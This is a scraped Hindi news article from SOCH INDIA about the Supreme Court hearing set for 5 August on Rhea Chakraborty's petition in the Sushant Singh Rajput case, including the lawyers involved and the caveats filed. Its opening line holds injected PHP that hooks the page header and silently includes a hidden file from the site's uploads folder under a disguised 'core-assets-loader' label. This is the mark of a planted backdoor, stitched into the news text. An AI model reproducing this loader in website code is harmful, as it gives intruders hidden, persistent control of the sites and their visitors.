add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); 5 अगस्त को SC में होगी रिया चक्रवर्ती की याचिका पर सुनवाई, ये वकील करेंगे बहस – SOCH INDIA
Menu

देश
5 अगस्त को SC में होगी रिया चक्रवर्ती की याचिका पर सुनवाई, ये वकील करेंगे बहस

nobanner

सुशांत सिंह राजपूत (Sushant Singh Rajput) की मौत के मामले में रिया चक्रवर्ती (Rhea Chakraborty) की याचिका पर सुप्रीम कोर्ट में 5 अगस्त को सुनवाई होगी, जिसमें तीन दिग्गज वकीलों की बहस होगी. इस याचिका को जस्टिस रिषीकेश रॉय सुनेंगे. इस मामले में वरिष्ठ वकील आर. बसंत महाराष्ट्र सरकार की तरफ से पेश होंगे. वकील आर. बसंत का सामना बिहार सरकार की तरफ से पेश होने वाले वकील सुप्रीम कोर्ट बार एसोसिएशन के पूर्व अध्यक्ष विकास सिंह और अटॉर्नी जनरल मुकुल रोहतगी से होगा.

इस मामले में महाराष्ट्र सरकार ने भी सुप्रीम कोर्ट में अपनी कैविएट फाइल की है, जिसमें कहा गया है कि रिया की याचिका पर सुनवाई के दौरान महाराष्ट्र सरकार का पक्ष भी सुना जाए और रिया की याचिका पर कोई एक तरफा आदेश जारी ना करें. बिहार सरकार और सुशांत सिंह राजपूत के पिता ने भी इस मामले में कैविएट दायर किया है.

बता दें कि सुशांत सिंह राजपूत की मौत के मामले में रिया चक्रवर्ती ने सुप्रीम कोर्ट में याचिका दायर की है. इसमें मांग की गई है कि पटना में दर्ज एफआईआर के आधार पर पुलिस की कार्रवाई पर रोक लगाई जाए और जांच को बिहार से मुंबई ट्रांसफर किया जाए, जहां इस मामले में पहले से ही जांच चल रही है. एक मामले की जांच दो जगह की पुलिस नहीं कर सकती है.